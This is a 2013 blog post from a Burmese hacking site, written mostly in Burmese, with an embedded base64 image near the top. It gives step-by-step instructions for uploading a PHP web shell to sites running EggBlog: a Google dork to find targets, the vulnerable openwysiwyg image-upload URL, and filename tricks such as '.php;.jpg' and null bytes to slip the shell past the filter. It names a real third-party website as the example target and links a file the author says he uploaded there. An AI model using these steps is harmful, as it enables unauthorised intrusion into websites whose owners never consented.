EggBlog Shell Upload ~ Zero Myanmar

Friday, May 3, 2013

EggBlog Shell Upload

data:image/jpeg;base64,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

' Website Hacking ပုိင္းေတာင္ မေရးျဖစ္တာၾကာပါျပီ....
ကြ်န္ေတာ္ တုိ ့အမ်ဳိးတည္းနာေရး ျဖစ္သြားလုိ ့ဗ်ာ.. ဘာမွကိုလုပ္ခ်င္ကိုင္ခ်င္စိတ္မရွိေတာ့ေလာက္ေအာင္ပါဘဲဗ်ာ...
စိတ္လည္းေတာ္ေတာ္ေလသြားတယ္.. ကဲဒါေတြထားပါ.. ခုနည္းေလး စလုိက္ရေအာင္ဗ်ာ..

Google Dork : "powered by eggBlog.net"

မိမိၾကိုက္တဲ့ဆုိဒ္လင့္ တစ္ခုကို ရယူလုိက္ပါ..

[+] Exploit Link
http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

[+] Uploaded File Link
http://server/[path]/photos/uploads/shell.php.jpg

[+] ဥပမာ ေအာက္ကလင့္ဘဲ ဆုိပါေတာ့ဗ်ာ..
http://www.websitesbyblake.com

[+]အဲ့ဆုိဒ္ကို ေအာက္ကလုိမ်ဳိးေလး အစားထုိးလုိက္ပါ...
http://www.websitesbyblake.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

[+]ဒါဆုိရင္ Image uploader ၾကီးထြက္လာပါမယ္...
သင့္ရွဲကုိ .php;.jpg .php%00%.jp စတာေလးတြ ေပ့ါ ေနာက္က null ေလးေတြကုိ မိမိ အေတြ ့အၾကဳံေလးနဲ ့အလုိက္သင့္သလုိ တင္သြားရပါမယ္.. Tempar data နဲ ့လည္း တစ္ခ်ဳိ ့ဆုိဒ္ေတြ
တင္လုိ ့ရပါတယ္..
ဖုိင္တင္ပီးရင္ေတာ့ ေအာက္ကလင့္မွျပန္ၾကည့္ရမွာျဖစ္ပါတယ္...

[+]ၾကည့္ရင္လင့္..
www.someone.com/photos/uploads/[file]

ေပ့ါ ဥပမာ အေနနဲ ့ေအာက္ကလင့္ေလးကိုၾကည့္ပါ...

[+] ပာိုးအရင္တုန္းက ကြ်န္ေတာ့ ပထမဆုံးဆုိဒ္ logo ေလးပါ...
http://www.websitesbyblake.com/photos/uploads/forsite.jpg

ေပ်ာ္ရႊင္ပါေစဗ်ာ..

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Zero Myanmar

Friday, May 3, 2013